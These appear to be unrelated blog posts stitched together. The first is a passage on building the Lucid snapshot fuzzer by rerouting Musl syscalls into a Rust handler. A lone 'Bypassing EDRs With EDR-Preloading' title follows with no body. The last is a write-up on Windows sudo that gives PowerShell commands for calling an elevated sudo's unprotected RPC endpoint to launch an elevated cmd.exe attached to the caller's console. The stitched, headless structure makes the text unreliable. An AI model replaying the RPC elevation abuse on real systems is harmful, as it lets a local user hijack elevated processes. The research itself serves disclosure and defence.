hidden void _dlstart_c(size_t *sp, size_t *dynv)
{
// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h
// so we can just do this here. That function logic clobbers only a few
// registers, so we can have the Lucid loader pass the address of the
// Lucid context in r15, this is obviously not the cleanest solution but
// it works for our purposes
size_t r15;
__asm__ __volatile__(
"mov %%r15, %0" : "=r"(r15)
);
// If r15 was not 0, set the global context address for the g_lucid_ctx that
// is in the Rust fuzzer
if (r15 != 0) {
g_lucid_ctx = (lucid_ctx_t *)r15;
// We have to make sure this is true, we rely on this
if ((void *)g_lucid_ctx != (void *)&g_lucid_ctx->exit_handler) {
__asm__ __volatile__("int3");
}
}
// We didn't get a g_lucid_ctx, so we can just run normally
else {
g_lucid_ctx = (lucid_ctx_t *)0;
}
When this function is called, r15 remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called r15 and check it for data. If it has data, we set the global context variable to the address in r15; otherwise we explicitly set it to NULL and run as normal. Now with the global set, we can do runtime checks for our environment and either call into the real kernel or into Lucid.
Lobotomizing Musl Syscalls
Now with our global set, it's time to edit the functions responsible for making syscalls. Musl is very well organized, so finding the syscall-invoking logic was not too difficult. For our target architecture, x86_64, those syscall-invoking functions live in arch/x86_64/syscall_arch.h. They are organized by how many arguments the syscall takes:
static __inline long __syscall0(long n)
{
unsigned long ret;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall1(long n, long a1)
{
unsigned long ret;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall2(long n, long a1, long a2)
{
unsigned long ret;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2)
: "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall3(long n, long a1, long a2, long a3)
{
unsigned long ret;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall4(long n, long a1, long a2, long a3, long a4)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10): "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall5(long n, long a1, long a2, long a3, long a4, long a5)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10), "r"(r8) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
For syscalls, there is a well-defined calling convention. A syscall takes a "syscall number" in eax that determines which syscall you want, and then the next n parameters are passed in the registers rdi, rsi, rdx, r10, r8, and r9, in that order.
This is pretty intuitive, but the syntax is a bit mystifying; for example, on those __asm__ __volatile__ ("syscall" ...) lines it's kind of hard to see what's happening. Let's take the most convoluted function, __syscall6, and break down all the syntax. We can think of the assembly syntax as a format string, like for printing, but for emitting code instead:
- unsigned long ret is where we will store the result of the syscall to indicate whether or not it was a success. In the raw assembly, the first set of parameters after the initial colon, "=a"(ret), indicates output parameters. We are saying: please store the result in eax (symbolized in the syntax as "a") into the variable ret.
- The next series of params after the next colon are input parameters. "a"(n) says place the function argument n, which is the syscall number, into eax, again symbolized as "a". Next, store a1 in rdi, which is symbolized as "D", and so forth.
- Arguments 4-6 are placed in registers above the asm statement; for instance, the syntax register long r10 __asm__("r10") = a4; is a strong compiler hint to store a4 into r10. Then later "r"(r10) says input the variable r10 in a general-purpose register (which is already satisfied).
- The last set of colon-separated values are known as "clobbers". These tell the compiler what our syscall is expected to corrupt: the syscall calling convention specifies that rcx, r11, and memory may be overwritten by the kernel.
With the syntax explained, we can see what is taking place. The job of these functions is to translate a function call into a syscall. The calling convention for functions, the System V ABI, differs from the syscall convention in which registers it uses. So when we call __syscall6 and pass its arguments, the function receives them in the function-call registers:

n → rdi
a1 → rsi
a2 → rdx
a3 → rcx
a4 → r8
a5 → r9
a6 → stack

The compiler then takes those function args from the System V ABI and translates them into the syscall registers via the assembly we explained above. So now these are the functions we need to edit so that we don't emit that syscall instruction and instead call into Lucid.
Conditionally Calling Into Lucid
So we need a way in these function bodies to call into Lucid instead of emitting syscall instructions. To do so we need to define our own calling convention; for now I've been using the following:

- r15: contains the address of the global Lucid execution context
- r14: contains an "exit reason", which is just an enum explaining why we are context-switching
- r13: holds the base address of the register bank structure in the Lucid execution context; we need this memory to store our register values and save our state when we context-switch
- r12: stores the address of the "exit handler", which is the function to call to context switch

This will no doubt change some as we add more features and functionality. I should also note that it is the function's responsibility to preserve these values according to the ABI; the caller expects that they won't change during a function call, yet we are changing them. That's OK because in the functions where we use them, we mark them as clobbers, remember? So the compiler is aware that they change: before executing any function code it pushes those registers onto the stack to save them, and before returning it pops them back so the caller gets back the expected values. So we're free to use them.
So to alter the functions, I changed the function logic to first check whether we have a global Lucid execution context; if we do not, we execute the normal Musl function. You can see that here, as I've moved the normal function logic out to a separate function called __syscall6_original:
static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
"r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers r12-r15 in accordance with what we expect when we context-switch to Lucid:
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
register long ret;
register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
register long r14 __asm__("r14") = SYSCALL;
register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
Now with our calling convention set up, we can use inline assembly as before. Notice we've replaced the syscall instruction with call r12, calling our exit handler as if it's a normal function:
__asm__ __volatile__ (
"mov %1, %%rax\n\t"
"mov %2, %%rdi\n\t"
"mov %3, %%rsi\n\t"
"mov %4, %%rdx\n\t"
"mov %5, %%r10\n\t"
"mov %6, %%r8\n\t"
"mov %7, %%r9\n\t"
"call *%%r12\n\t"
"mov %%rax, %0\n\t"
: "=r" (ret)
: "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
"r" (r12), "r" (r13), "r" (r14), "r" (r15)
: "rax", "rcx", "r11", "memory"
);
return ret;
So now we're calling the exit handler instead of syscalling into the kernel, and all of the registers are set up as if we're syscalling. We've also got our calling convention registers in place. Let's see what happens when we land in the exit handler, a function implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!
Implementing a Context Switch
The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:
extern "C" { fn exit_handler(); }
global_asm!(
".global exit_handler",
"exit_handler:",
So this function is what Bochs will jump to when it tries to syscall under Lucid. The first thing to consider is that we need to keep track of Bochs' state the way the kernel would upon entry to a context-switching routine. We'll start by saving off the general-purpose registers. By doing this, we preserve the state of the registers and also unlock them for our own use; since we save them first, we're then free to use them. Remember that our calling convention uses r13 to store the base address of the execution context's register bank:
#[repr(C)]
#[derive(Default, Clone)]
pub struct RegisterBank {
pub rax: usize,
rbx: usize,
rcx: usize,
pub rdx: usize,
pub rsi: usize,
pub rdi: usize,
rbp: usize,
rsp: usize,
pub r8: usize,
pub r9: usize,
pub r10: usize,
r11: usize,
r12: usize,
r13: usize,
r14: usize,
r15: usize,
}
We can save the register values then by doing this:
// Save the GPRS to memory
"mov [r13 + 0x0], rax",
"mov [r13 + 0x8], rbx",
"mov [r13 + 0x10], rcx",
"mov [r13 + 0x18], rdx",
"mov [r13 + 0x20], rsi",
"mov [r13 + 0x28], rdi",
"mov [r13 + 0x30], rbp",
"mov [r13 + 0x38], rsp",
"mov [r13 + 0x40], r8",
"mov [r13 + 0x48], r9",
"mov [r13 + 0x50], r10",
"mov [r13 + 0x58], r11",
"mov [r13 + 0x60], r12",
"mov [r13 + 0x68], r13",
"mov [r13 + 0x70], r14",
"mov [r13 + 0x78], r15",
This saves the register values into the register bank in memory for preservation. Next, we'll want to preserve the CPU's flags; luckily there is a single instruction for this purpose, pushfq, which pushes the flag values onto the stack.
We're using a pure assembly stub right now, but we'd like to start using Rust at some point, and that point is now. We've saved all the state we can for the moment, and it's time to call into a real Rust function that will make programming and implementation easier. To call into a function, though, we need to set up the register values to adhere to the function-calling ABI. Two pieces of data we want accessible are the execution context and the reason why we exited; remember, those are in r15 and r14 respectively. So we can simply place them into the registers used for passing function arguments and call into a Rust function called lucid_handler.
// Save the CPU flags
"pushfq",
// Set up the function arguments for lucid_handler according to ABI
"mov rdi, r15", // Put the pointer to the context into RDI
"mov rsi, r14", // Put the exit reason into RSI
// At this point, we've been called into by Bochs, this should mean that
// at the beginning of our exit_handler, rsp was only 8-byte aligned and
// thus, by ABI, we cannot legally call into a Rust function since to do so
// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte
// aligned the stack for us and so we are free to `call`
"call lucid_handler",
So now we are free to execute real Rust code! Here is lucid_handler as of now:
// This is where the actual logic is for handling the Bochs exit, we have to
// use no_mangle here so that we can call it from the assembly blob. We need
// to see why we've exited and dispatch to the appropriate function
#[no_mangle]
fn lucid_handler(context: *mut LucidContext, exit_reason: i32) {
// We have to make sure this bad boy isn't NULL
if context.is_null() {
println!("LucidContext pointer was NULL");
fatal_exit();
}
// Ensure that we have our magic value intact, if this is wrong, then we
// are in some kind of really bad state and just need to die
let magic = LucidContext::ptr_to_magic(context);
if magic != CTX_MAGIC {
println!("Invalid LucidContext Magic value: 0x{:X}", magic);
fatal_exit();
}
// Before we do anything else, save the extended state
let save_inst = LucidContext::ptr_to_save_inst(context);
if save_inst.is_err() {
println!("Invalid Save Instruction");
fatal_exit();
}
let save_inst = save_inst.unwrap();
// Get the save area
let save_area =
LucidContext::ptr_to_save_area(context, SaveDirection::FromBochs);
if save_area == 0 || save_area % 64 != 0 {
println!("Invalid Save Area");
fatal_exit();
}
// Determine save logic
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) } as u64;
// Call xsave to save the extended state to Bochs save area
unsafe { _xsave64(save_area as *mut u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxsave to save the extended state to Bochs save area
unsafe { _fxsave64(save_area as *mut u8); }
},
_ => (), // NoSave
}
// Try to convert the exit reason into BochsExit
let exit_reason = BochsExit::try_from(exit_reason);
if exit_reason.is_err() {
println!("Invalid Bochs Exit Reason");
fatal_exit();
}
let exit_reason = exit_reason.unwrap();
// Determine what to do based on the exit reason
match exit_reason {
BochsExit::Syscall => {
syscall_handler(context);
},
}
// Restore extended state, determine restore logic
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) } as u64;
// Call xrstor to restore the extended state from Bochs save area
unsafe { _xrstor64(save_area as *const u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxrstor to restore the extended state from Bochs save area
unsafe { _fxrstor64(save_area as *const u8); }
},
_ => (), // NoSave
}
}
There are a few important pieces here to discuss.
Extended State
Let's start with this concept of the save area. What is that? Well, we already have the general-purpose registers and CPU flags saved, but there is what's called the "extended state" of the processor that we haven't saved. This can include the floating-point registers, vector registers, and other state the processor uses to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other things like control registers. Is this important? It's hard to say; we don't know wtf Bochs will do, and it might count on this state being preserved across function calls, so I thought we'd go ahead and do it.
To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I query the processor for two saving instructions to see if they're available; if neither is, for now, we don't support anything else. So when we create the execution context initially, we determine what save instruction we'll need and store that answer in the execution context. Then on a context switch, we can dynamically use the appropriate extended-state saving function. This works because we don't use any of the extended state in lucid_handler yet, so it's still preserved. You can see how I check during context initialization here:
pub fn new() -> Result<Self, LucidErr> {
// Check for what kind of features are supported we check from most
// advanced to least
let save_inst = if std::is_x86_feature_detected!("xsave") {
SaveInst::XSave64
} else if std::is_x86_feature_detected!("fxsr") {
SaveInst::FxSave64
} else {
SaveInst::NoSave
};
// Get save area size
let save_size: usize = match save_inst {
SaveInst::NoSave => 0,
_ => calc_save_size(),
};
The way this works is that the processor takes a pointer to the memory where you want the state saved, plus a mask of which specific state components you want. I just maxed out the amount of state to save and asked the CPU how much memory that would require:
// Standalone function to calculate the size of the save area for saving the
// extended processor state based on the current processor's features. `cpuid`
// will return the save area size based on the value of the XCR0 when ECX==0
// and EAX==0xD. The value returned to EBX is based on the current features
// enabled in XCR0, while the value returned in ECX is the largest size it
// could be based on CPU capabilities. So out of an abundance of caution we use
// the ECX value. We have to preserve EBX or rustc gets angry at us. We are
// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.
fn calc_save_size() -> usize {
let save: usize;
unsafe {
asm!(
"push rbx",
"mov rax, 0xD",
"xor rcx, rcx",
"cpuid",
"pop rbx",
out("rax") _, // Clobber
out("rcx") save, // Save the max size
out("rdx") _, // Clobbered by CPUID output (w eax)
);
}
// Round up to the nearest page size
(save + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}
I page-align the result, map that much memory during execution-context initialization, and save the address in the execution context. Now at runtime in lucid_handler we can save the extended state:
// Determine save logic
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) } as u64;
// Call xsave to save the extended state to Bochs save area
unsafe { _xsave64(save_area as *mut u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxsave to save the extended state to Bochs save area
unsafe { _fxsave64(save_area as *mut u8); }
},
_ => (), // NoSave
}
Right now, the only exit reason we handle is syscalls, so we invoke our syscall handler and then restore the extended state before returning to the exit_handler assembly stub:
// Determine what to do based on the exit reason
match exit_reason {
BochsExit::Syscall => {
syscall_handler(context);
},
}
// Restore extended state, determine restore logic
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) } as u64;
// Call xrstor to restore the extended state from Bochs save area
unsafe { _xrstor64(save_area as *const u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxrstor to restore the extended state from Bochs save area
unsafe { _fxrstor64(save_area as *const u8); }
},
_ => (), // NoSave
}
Let's see how we handle syscalls.
Implementing Syscalls
When we run the test program normally, not under Lucid, we get the following output:
Argument count: 1
Args:
-./test
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0
And when we run it with strace, we can see what syscalls are made:
execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8) = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base=" -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2 -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0) = ?
+++ exited with 0 +++
We see that the first two syscalls are involved with process creation; we don't need to worry about those since our process is already created and loaded in memory. The other syscalls are ones we'll need to handle: set_tid_address, ioctl, and writev. We don't worry about exit_group yet, as that will be a fatal exit condition because Bochs shouldn't exit while we're snapshot fuzzing.
So we can use our saved register-bank information to extract the syscall number from eax and dispatch to the appropriate syscall function. You can see that logic here:
// This is where we process Bochs making a syscall. All we need is a pointer to
// the execution context, and we can then access the register bank and all the
// peripheral structures we need
#[allow(unused_variables)]
pub fn syscall_handler(context: *mut LucidContext) {
// Get a handle to the register bank
let bank = LucidContext::get_register_bank(context);
// Check what the syscall number is
let syscall_no = (*bank).rax;
// Get the syscall arguments
let arg1 = (*bank).rdi;
let arg2 = (*bank).rsi;
let arg3 = (*bank).rdx;
let arg4 = (*bank).r10;
let arg5 = (*bank).r8;
let arg6 = (*bank).r9;
match syscall_no {
// ioctl
0x10 => {
//println!("Handling ioctl()...");
// Make sure the fd is 1, that's all we handle right now?
if arg1 != 1 {
println!("Invalid `ioctl` fd: {}", arg1);
fatal_exit();
}
// Check the `cmd` argument
match arg2 as u64 {
// Requesting window size
libc::TIOCGWINSZ => {
// Arg 3 is a pointer to a struct winsize
let winsize_p = arg3 as *mut libc::winsize;
// If it's NULL, return an error, we don't set errno yet
// that's a weird problem
// TODO: figure out that whole TLS issue yikes
if winsize_p.is_null() {
(*bank).rax = usize::MAX;
return;
}
// Deref the raw pointer
let winsize = unsafe { &mut *winsize_p };
// Set to some constants
winsize.ws_row = WS_ROW;
winsize.ws_col = WS_COL;
winsize.ws_xpixel = WS_XPIXEL;
winsize.ws_ypixel = WS_YPIXEL;
// Return success
(*bank).rax = 0;
},
_ => {
println!("Unhandled `ioctl` argument: 0x{:X}", arg1);
fatal_exit();
}
}
},
// writev
0x14 => {
//println!("Handling writev()...");
// Get the fd
let fd = arg1 as libc::c_int;
// Make sure it's an fd we handle
if fd != STDOUT {
println!("Unhandled writev fd: {}", fd);
}
// An accumulator that we return
let mut bytes_written = 0;
// Get the iovec count
let iovcnt = arg3 as libc::c_int;
// Get the pointer to the iovec
let mut iovec_p = arg2 as *const libc::iovec;
// If the pointer was NULL, just return error
if iovec_p.is_null() {
(*bank).rax = usize::MAX;
return;
}
// Iterate through the iovecs and write the contents
green!();
for _ in 0..iovcnt {
bytes_written += write_iovec(iovec_p);
// Advance to the next iovec
iovec_p = unsafe { iovec_p.offset(1) };
}
clear!();
// Update return value
(*bank).rax = bytes_written;
},
// nanosleep
0x23 => {
//println!("Handling nanosleep()...");
(*bank).rax = 0;
},
// set_tid_address
0xDA => {
//println!("Handling set_tid_address()...");
// Just return Bochs' pid, no need to do anything
(*bank).rax = BOCHS_PID as usize;
},
_ => {
println!("Unhandled Syscall Number: 0x{:X}", syscall_no);
fatal_exit();
}
}
}
That's about it! It's kind of fun acting as the kernel. Right now our test program doesn't do much, but I bet we're going to have to figure out how to deal with things like files when using Bochs; that's for another time, though. Now all there is to do, after setting the return code via rax, is return to the exit_handler stub and then back to Bochs gracefully.
Returning Gracefully
// Restore the flags
"popfq",
// Restore the GPRS
"mov rax, [r13 + 0x0]",
"mov rbx, [r13 + 0x8]",
"mov rcx, [r13 + 0x10]",
"mov rdx, [r13 + 0x18]",
"mov rsi, [r13 + 0x20]",
"mov rdi, [r13 + 0x28]",
"mov rbp, [r13 + 0x30]",
"mov rsp, [r13 + 0x38]",
"mov r8, [r13 + 0x40]",
"mov r9, [r13 + 0x48]",
"mov r10, [r13 + 0x50]",
"mov r11, [r13 + 0x58]",
"mov r12, [r13 + 0x60]",
"mov r13, [r13 + 0x68]",
"mov r14, [r13 + 0x70]",
"mov r15, [r13 + 0x78]",
// Return execution back to Bochs!
"ret"
We restore the CPU flags, restore the general-purpose registers, and then simply ret as if we're done with a normal function call. Don't forget we already restored the extended state within lucid_handler before returning from that function.
Conclusion
And just like that, we have infrastructure capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. The output below demonstrates the test program running under Lucid with us handling the syscalls ourselves:
[08:15:56] lucid> Loading Bochs...
[08:15:56] lucid> Bochs mapping: 0x10000 - 0x18000
[08:15:56] lucid> Bochs mapping size: 0x8000
[08:15:56] lucid> Bochs stack: 0x7F8A50FCF000
[08:15:56] lucid> Bochs entry: 0x11058
[08:15:56] lucid> Creating Bochs execution context...
[08:15:56] lucid> Starting Bochs...
Argument count: 4
Args:
-./bochs
-lmfao
-hahahah
-yes!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7
Next Up?
Next we will compile Bochs against Musl and work on getting it running. We'll need to implement all of its syscalls as well as get it running a test target that we'll want to snapshot and run over and over. So the next blog post should feature a syscall-sandboxed Bochs snapshotting and rerunning a hello-world type target. Until then!
Bypassing EDRs With EDR-Preloading
Sudo On Windows a Quick Rundown
Background
The Windows Insider Preview build 26052 just shipped with a sudo command, so I thought I'd take a quick peek to see what it does and how it does it. This is only a short write-up of my findings; I think this code is probably still in early stages so I wouldn't want it to be treated too harshly. You can see the official announcement here.
To run a command using sudo you can just type:
C:\> sudo powershell.exe
The first thing to note, if you know anything about the security model of Windows (maybe buy my book, hint hint), is that there's no equivalent to SUID binaries. The only way to run a process with a higher privilege level is to get an existing higher privileged process to start it for you, or to have sufficient permissions yourself through, say, SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege and an access token for a more privileged user. Since Vista, the main way of facilitating running more privileged code as a normal user is UAC. Therefore this is how sudo does it under the hood: it just spawns a process via UAC using the ShellExecute runas verb.
This is slightly disappointing, as I was hoping the developers would have implemented a sudo service running at a higher privilege level to mediate access. Instead this is really just a fancy executable that you can elevate using the existing UAC mechanisms.
The other sad thing is, as is Microsoft tradition, this is a sudo command in name only. It doesn't support any policies which would allow a user to run specific commands elevated, either with a password requirement or without. It'll run anything you give it, but only if that user can pass a UAC elevation prompt.
There are four modes of operation that can be configured in system settings; why this needs to be a system setting I don't really know.
Initially sudo is disabled; running the sudo command just prints "Sudo is disabled on this machine. To enable it, go to the Developer Settings page in the Settings app". This isn't because of some fundamental limit on the behavior of the sudo implementation, it's just an Enabled value in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo which is set to 0.
The next option (value 1) is to run the command in a new window. All this does is pass the command line you gave to sudo to ShellExecute with the runas verb. Therefore you just get the normal UAC dialog showing for that command. Considering the general move to using PowerShell for everything you can already do this easily enough with the command:
PS> Start-Process -Verb runas powershell.exe
The third and fourth options (values 2 and 3) are "With input disabled" and "Inline". They're more or less the same: both run the command and attach it to the current console window by sharing the standard handles across to the new process. They use the same implementation behind the scenes to do this: a copy of the sudo binary is elevated with the command line and the calling PID of the non-elevated sudo. E.g. it might try running the following command via UAC:
C:\> sudo elevate -p 1234 powershell.exe
Oddly, as we'll see, passing the PID and the command seems to be mostly unnecessary. At best it's useful if you want to show more information about the command in the UAC dialog, but again, as we'll see, this isn't that useful.
The only difference between the two is that with "With input disabled" you can only output text from the elevated application, you can't interact with it, whereas the Inline mode allows you to run the command elevated in the same console session. This final mode has the obvious risk that the command is running elevated but attached to a low privileged window. Malicious code could inject keystrokes into that console window to control the privileged process. This was pointed out in the Microsoft blog post linked earlier. However, the blog does say that running it with input disabled mitigates this issue somewhat; as we'll see, it does not.
How It Really Works
For the "New Window" mode all sudo is doing is acting as a wrapper to call ShellExecute. For the inline modes it requires a bit more work. Again, go back and read the Microsoft blog post; tbh it gives a reasonable overview of how it works. The blog has the following diagram, which I'll reproduce here in case the link dies.
What always gets me interested is where there's an RPC channel involved. The reason a communications channel exists is due to the limitations of UAC: it very intentionally doesn't allow you to attach elevated console processes to an existing low privileged console (grumble, UAC is not a security boundary, but then why does it do this if it isn't, grumble). It also doesn't pass along a few important settings such as the current directory or the environment, which would be useful features to have in a sudo-like command. Therefore it makes sense for the non-elevated sudo to pass that information to the elevated version.
Letβs check out the RPC server using NtObjectManager:
PS> $rpc = Get-RpcServer C:\windows\system32\sudo.exe
PS> Format-RpcServer $rpc
[
  uuid(F691B703-F681-47DC-AFCD-034B2FAAB911),
  version(1.0)
]
interface intf_f691b703_f681_47dc_afcd_034b2faab911 {
    int server_PrepareFileHandle([in] handle_t _hProcHandle, [in] int p0, [in, system_handle(sh_file)] HANDLE p1);
    int server_PreparePipeHandle([in] handle_t _hProcHandle, [in] int p0, [in, system_handle(sh_pipe)] HANDLE p1);
    int server_DoElevationRequest([in] handle_t _hProcHandle, [in, system_handle(sh_process)] HANDLE p0, [in] int p1, [in, string] char* p2, [in, size_is(p4)] byte* p3[], [in] int p4, [in, string] char* p5, [in] int p6, [in] int p7, [in, size_is(p9)] byte* p8[], [in] int p9);
    void server_Shutdown([in] handle_t _hProcHandle);
}
Of the four functions, the key one is server_DoElevationRequest. This is what actually does the elevation. Doing a quick bit of analysis it seems the parameters correspond to the following:
HANDLE p0 - Handle to the calling process.
int p1 - The type of the new process, 2 being input disabled, 3 being inline.
char* p2 - The command line to execute (oddly, in ANSI characters)
byte* p3[] - Not sure.
int p4 - Size of p3.
char* p5 - The current directory.
int p6 - Not sure, seems to be set to 1 when called.
int p7 - Not sure, seems to be set to 0 when called.
byte* p8 - Pointer to the environment block to use.
int p9 - Length of environment block.
The RPC server is registered to use ncalrpc with the port name being sudo_elevate_PID, where PID is just the value passed on the elevation command line for the -p argument. The PID isn't used for determining the console to attach to; that is instead passed through the HANDLE parameter, which is only used to query its PID to pass to the AttachConsole API.
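The endpoint naming scheme is simple enough to sketch. This is my own illustrative helper (endpoint_name is not a function in sudo itself), just showing how the ALPC port name is derived from the -p value:

```rust
// Sketch of the ncalrpc endpoint naming described above: the elevated
// sudo listens on an ALPC port named after the PID passed via `-p`.
// `endpoint_name` is a hypothetical helper, not part of sudo itself.
fn endpoint_name(pid: u32) -> String {
    format!("sudo_elevate_{}", pid)
}

fn main() {
    // A sudo elevated with `-p 4652` registers:
    println!("{}", endpoint_name(4652)); // sudo_elevate_4652
}
```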
Also, as said before, as far as I can tell the command line passed to the elevated sudo is unused; it's in fact this RPC call which is responsible for executing the command properly. This results in something interesting: the elevated copy of sudo doesn't exit once the new process has started, it in fact keeps the RPC server open and will accept further requests for new processes to attach to. For example you can do the following to get a running elevated sudo instance to attach an elevated command prompt to the current PowerShell console:
PS> $c = Get-RpcClient $rpc
PS> Connect-RpcClient $c -EndpointPath sudo_elevate_4652
PS> $c.server_DoElevationRequest((Get-NtProcess -ProcessId $pid), 3, "cmd.exe", @(), 0, "C:\", 1, 0, @(), 0)
There are no checks on the caller's PID to make sure it's really the non-elevated sudo making the request. As long as the RPC server is running you can make the call. Finding the ALPC port is easy enough, you can just enumerate all the ALPC ports in \RPC Control to find them.
A further interesting thing to note is that the type parameter (p1) doesn't have to match the configured sudo mode in settings. Passing 2 to the parameter runs the command with input disabled, but passing any other value runs in the inline mode. Therefore even if sudo is configured in new-window mode, there's nothing stopping you running the elevated sudo manually, with a trusted Microsoft-signed-binary UAC prompt, and then attaching the inline mode via the RPC service. E.g. you can run sudo using the following PowerShell:
PS> Start-Process -Verb runas -FilePath sudo -ArgumentList "elevate", "-p", 1111, "cmd.exe"
Fortunately sudo will exit immediately if it's configured in disabled mode, so as long as you don't change the defaults it's fine, I guess.
I find it odd that Microsoft would rely on UAC when UAC is supposed to be going away. Even more so that this command could have just been a PowerToy, as other than the settings UI changes it really doesn't need any integration with the OS to function. And in fact I'd argue that it doesn't need those settings either. At any rate, this is no more a security risk than UAC already is, or is it…
Looking back at how the RPC server is registered can be enlightening:
RPC_STATUS StartRpcServer(RPC_CSTR Endpoint) {
  RPC_STATUS result;
  result = RpcServerUseProtseqEpA("ncalrpc",
      RPC_C_PROTSEQ_MAX_REQS_DEFAULT, Endpoint, NULL);
  if ( !result )
  {
    result = RpcServerRegisterIf(server_sudo_rpc_ServerIfHandle, NULL, NULL);
    if ( !result )
      return RpcServerListen(1, RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 0);
  }
  return result;
}
Oh no, that's not good. The code doesn't provide a security descriptor for the ALPC port, and it calls RpcServerRegisterIf to register the server, which should basically never be used. This old function doesn't allow you to specify a security descriptor or a security callback. What this means is that any user on the same system can connect to this service and execute sudo commands. We can double check using some PowerShell:
PS> $as = Get-NtAlpcServer
PS> $sudo = $as | ? Name -Match sudo
PS> $sudo.Name
sudo_elevate_4652
